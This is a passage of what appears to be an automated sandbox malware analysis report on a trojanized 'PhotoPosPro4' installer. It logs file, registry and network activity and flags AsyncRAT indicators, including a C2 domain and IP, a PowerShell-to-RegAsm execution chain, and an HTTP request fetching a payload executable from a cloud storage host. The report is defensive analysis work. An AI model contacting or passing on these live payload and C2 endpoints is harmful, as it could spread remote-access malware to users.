                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1042\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1045\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1046\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1049\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\1055\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\2052\license.rtf
                  Source: C:\Windows\Temp\{BFA338A6-4BEC-4DCA-B0C7-673670D2EE98}\.cr\vcredist_x64.exeFile created: C:\Windows\Temp\{056E7126-EE52-419A-9FCE-2A38AA80538D}\.ba\3082\license.rtf
                  Source: unknownHTTPS traffic detected: 172.64.145.29:443 -> 192.168.2.4:49745 version: TLS 1.2
                  Source: PhotoPosPro4_SetUp.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                  Source: Binary string: wininet.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1717614800.0000000009AF8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\agent\_work\8\s\build\ship\x86\burn.pdb source: vcredist_x64.exe, 00000017.00000002.2087090753.00000000007AB000.00000002.00000001.01000000.00000010.sdmp, vcredist_x64.exe, 00000017.00000000.2073125075.00000000007AB000.00000002.00000001.01000000.00000010.sdmp, vcredist_x64.exe, 00000018.00000002.2085203247.000000000017B000.00000002.00000001.01000000.00000012.sdmp, vcredist_x64.exe, 00000018.00000000.2074854131.000000000017B000.00000002.00000001.01000000.00000012.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\XmlCfg.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: D:\Documents and Settings\Yoni A\VS2010 Applications\Pos Controls and Libs\PhotoPosPro_PreInstaller\obj\Debug\PhotoPosPro_PreInstaller.pdb source: PhotoPosPro_PreInstaller.exe, 00000019.00000000.2088033481.0000000000FA2000.00000002.00000001.01000000.00000015.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, MSID82B.tmp, 00000008.00000000.1840081823.00007FF71B7A1000.00000002.00000001.01000000.0000000A.sdmp, MSID82B.tmp, 00000008.00000002.1846400953.00007FF71B7A1000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: RegAsm.exe, 0000001D.00000002.2982481428.0000000002956000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2861568883.0000000004465000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2861568883.0000000004463000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2711123189.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2784580202.0000000005860000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x64\viewer.pdbB source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp, MSID82B.tmp, 00000008.00000000.1840081823.00007FF71B7A1000.00000002.00000001.01000000.0000000A.sdmp, MSID82B.tmp, 00000008.00000002.1846400953.00007FF71B7A1000.00000002.00000001.01000000.0000000A.sdmp
                  Source: Binary string: F:\DotNet\workspace\ShellBrowser.NET Nightly\bin\protect\Release\ShellBrowser.pdb source: Photo Pos Pro 4.exe, 0000001E.00000002.3109776794.00000202D1012000.00000002.00000001.01000000.00000022.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\Prereq.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: RegAsm.exe, 0000001D.00000002.2982481428.0000000002956000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2861568883.0000000004465000.00000004.00000800.00020000.00000000.sdmp, ebghls.exe, 00000021.00000002.2861568883.0000000004463000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2711123189.0000000003B51000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2784580202.0000000005860000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: wininet.pdbUGP source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1717614800.0000000009AF8000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: f:\dd\vbextras\PowerPacks\objr\i386\Microsoft.VisualBasic.PowerPacks.Vs.pdb source: Photo Pos Pro 4.exe, 0000001E.00000002.3093428256.00000202CE450000.00000002.00000001.01000000.00000021.sdmp
                  Source: Binary string: protobuf-net.pdb source: RegAsm.exe, 00000024.00000002.2782140500.0000000003D0C000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000024.00000002.2782140500.0000000003BD2000.00000004.00000800.00020000.00000000.sdmp, smcdll.exe, 00000028.00000002.2781762732.0000000005810000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\XmlCfg.pdbg source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: F:\DotNet\workspace\ShellBrowser.NET Nightly\bin\protect\Release\ShellBrowser.pdbpq source: Photo Pos Pro 4.exe, 0000001E.00000002.3109776794.00000202D1012000.00000002.00000001.01000000.00000022.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\lzmaextractor.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\custact\x86\AICustAct.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000003.1709301896.0000000009AFE000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: C:\ReleaseAI\win\Release\stubs\x86\ExternalUi.pdb source: PhotoPosPro4_SetUp.exe, 00000000.00000002.1872193567.0000000000477000.00000002.00000001.01000000.00000003.sdmp, PhotoPosPro4_SetUp.exe, 00000000.00000000.1693510869.0000000000477000.00000002.00000001.01000000.00000003.sdmp
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: z:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: x:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: v:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: t:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: r:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: p:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: n:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: l:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: j:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: h:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: f:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: b:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: y:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: w:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: u:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: s:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: q:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: o:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: m:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: k:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: i:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: g:Jump to behavior
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: e:Jump to behavior
                  Source: C:\Windows\System32\wscript.exeFile opened: c:
                  Source: C:\Windows\SysWOW64\msiexec.exeFile opened: a:Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER_Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}\InprocServer32
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0033E090 FindFirstFileW,FindClose,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,0_2_0033E090
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_003402E0 FindFirstFileW,FindClose,CloseHandle,CloseHandle,0_2_003402E0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00314D70 FindFirstFileW,GetLastError,FindClose,0_2_00314D70
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001D4DD0 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,0_2_001D4DD0
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0033D390 FindFirstFileW,FindClose,DeleteFileW,GetLastError,0_2_0033D390
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0033A320 FindFirstFileW,FindClose,0_2_0033A320
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_0035E410 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,0_2_0035E410
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00314440 FindFirstFileW,FindFirstFileW,FindClose,FindClose,0_2_00314440
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_00322D10 FindFirstFileW,FindClose,FindClose,0_2_00322D10
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_0040F6DB lstrlenA,lstrlenA,lstrcpyA,lstrcatA,FindFirstFileA,FindClose,lstrlenA,FindClose,lstrcpyA,lstrcatA,lstrlenA,lstrcmpiA,FindNextFileA,FindClose,FindClose,lstrlenA,lstrcpyA,FindClose,6_2_0040F6DB
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeCode function: 6_2_0040C689 FindFirstFileA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,lstrcmpiA,SendDlgItemMessageA,FindNextFileA,FindClose,6_2_0040C689
                  Source: C:\Windows\Installer\MSID82B.tmpCode function: 8_2_00007FF71B793AE4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,8_2_00007FF71B793AE4
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_0040C689 FindFirstFileA,SendDlgItemMessageA,SendDlgItemMessageA,SendDlgItemMessageA,lstrcmpiA,SendDlgItemMessageA,FindNextFileA,FindClose,14_2_0040C689
                  Source: C:\Users\user\AppData\Local\Temp\inst5429125\installer\PhotoPosPro4_SetUp.exe_tmp.exeCode function: 14_2_0040F6DB lstrlenA,lstrlenA,lstrcpyA,lstrcatA,FindFirstFileA,FindClose,lstrlenA,FindClose,lstrcpyA,lstrcatA,lstrlenA,lstrcmpiA,FindNextFileA,FindClose,FindClose,lstrlenA,lstrcpyA,FindClose,14_2_0040F6DB
                  Source: C:\Users\user\Desktop\PhotoPosPro4_SetUp.exeCode function: 0_2_001F8930 GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLastError,0_2_001F8930
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppData\Local\Temp\inst5429125\installerJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\userJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppDataJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                  Source: C:\Program Files (x86)\PhotoPosPro4_SetUp.exeFile opened: C:\Users\user\AppData\Local\Temp\inst5429125Jump to behavior

                  Software Vulnerabilities

                  barindex
                  Suspicious execution chain found
                  Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeChild: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2842478 - Severity 1 - ETPRO JA3 Hash - Suspected ASYNCRAT Server Cert (ja3s) : 157.20.182.16:1414 -> 192.168.2.4:50054
                  Source: Network trafficSuricata IDS: 2030673 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 157.20.182.16:1414 -> 192.168.2.4:50054
                  Source: Network trafficSuricata IDS: 2035595 - Severity 1 - ET MALWARE Generic AsyncRAT/zgRAT Style SSL Cert : 157.20.182.16:1414 -> 192.168.2.4:50054
                  Source: Network trafficSuricata IDS: 2035607 - Severity 1 - ET MALWARE Observed Malicious SSL Cert (AsyncRAT Server) : 157.20.182.16:1414 -> 192.168.2.4:50054
                  System process connects to network (likely due to code injection or exploit)
                  Source: C:\Windows\System32\svchost.exeDomain query: s0.2mdn.net
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: jojo.ath.cx
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 157.20.182.16 ports 58002,0,1414,2,5,8
                  Source: global trafficTCP traffic: 192.168.2.4:49742 -> 157.20.182.16:58002
                  Source: global trafficHTTP traffic detected: GET /Wpmutnro.exe HTTP/1.1Host: filekg-download-01.fra1.cdn.digitaloceanspaces.comConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 151.101.193.229 151.101.193.229
                  Source: Joe Sandbox ViewIP Address: 151.101.3.1 151.101.3.1
                  Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:50040 -> 2.19.100.239:443
                  Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:50218 -> 23.58.104.30:443
                  Source: Network trafficSuricata IDS: 2022112 - Severity 1 - ET EXPLOIT_KIT Possible Nuclear EK Landing Nov 17 2015 : 192.168.2.4:50248 -> 104.119.108.27:443
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownTCP traffic detected without corresponding DNS query: 173.222.162.32
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /Wpmutnro.exe HTTP/1.1Host: filekg-download-01.fra1.cdn.digitaloceanspaces.comConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/cgi-bin/MainRouter1.aspx?NavigatationID=AfterInstallThankYouPage&Param1=PhotoPosPro HTTP/1.1Host: www.photopos.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/PPP3Help.aspx HTTP/1.1Host: www.photopos.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspx HTTP/1.1Host: www.photopos.comConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/WebResource.axd?d=9p3gvwZUx3_KaVXGD-X7M51F-VL5jYdnWe0CW-BfpTnUXEjoRtSjdMVwf_wFObFpDGMX02c30znEqiW6iPP-W4KDDXDgH2DtT3GEBFZs0JOEKlYejirihzfkZwunBia1TfTUn2suR_w9qUDmLzsZ5Q2&t=637733355006018647 HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/WebResource.axd?d=pF9vJXA6r-t-HexXXqn3vScNCxBDAl3RZMBECZRnvMBc2lulRQEN71Ap4CG8bVGonWAtMfeNEy0nhUcxaQzgvYJyZHAmc3pt11NmNJgzqbYY4adFbELCpadVy3duI4YrPzk14hGi3ahshQFG7y4ViWBAtQbhRcQhEoFy8uKpT4E1&t=637733224482224112 HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/WebResource.axd?d=_65LVv16Z7ModAVA6m4J7tA5rWvgX2E2qNVZK3iMxWMq9RE9AjN_gnT2WIeI2deU9Xt2pU8bpmUQM_TeawcSp7oLGggqNp5XuTn3Aq9WT_2TDUDgnX-o7rAmy2PKLtNRIORbWaMzxw30-wBtEtZLOA2&t=637733355006018647 HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/WebResource.axd?d=0V7of4NsKHlqBpJsioscpyJ9q1T2ge1PclWgrokyuisaI8w0uhmmJejopXg_2RPvUu1tQA4GeHBEF_xS-6WyL77GDaJ3gtzLg2PvNlcfShgAra0ueCFEb0QhITpQb2ri-M2sTIW_dGNuE_N8J5fiMQv-S0penpbR_Y75vWfb4so1&t=637733224482224112 HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
                  Source: global trafficHTTP traffic detected: GET /PhotoPosPro_FreePhotoEditor_v3/WebResource.axd?d=If-wwzIpntPAg-P5k4Uzq-SSdn9HTy7tAT5sc509JOty8uQr7_fzhXOQ1UiQse-qow6j_O184hxTkEPBS2zwDqQqxUE9DGS7M-fZIPCwmEI1&t=638627972640000000 HTTP/1.1Host: www.photopos.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://www.photopos.com/PhotoPosPro_FreePhotoEditor_v3/Help%20Pages/PPP3_Help_Welcome.aspxAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
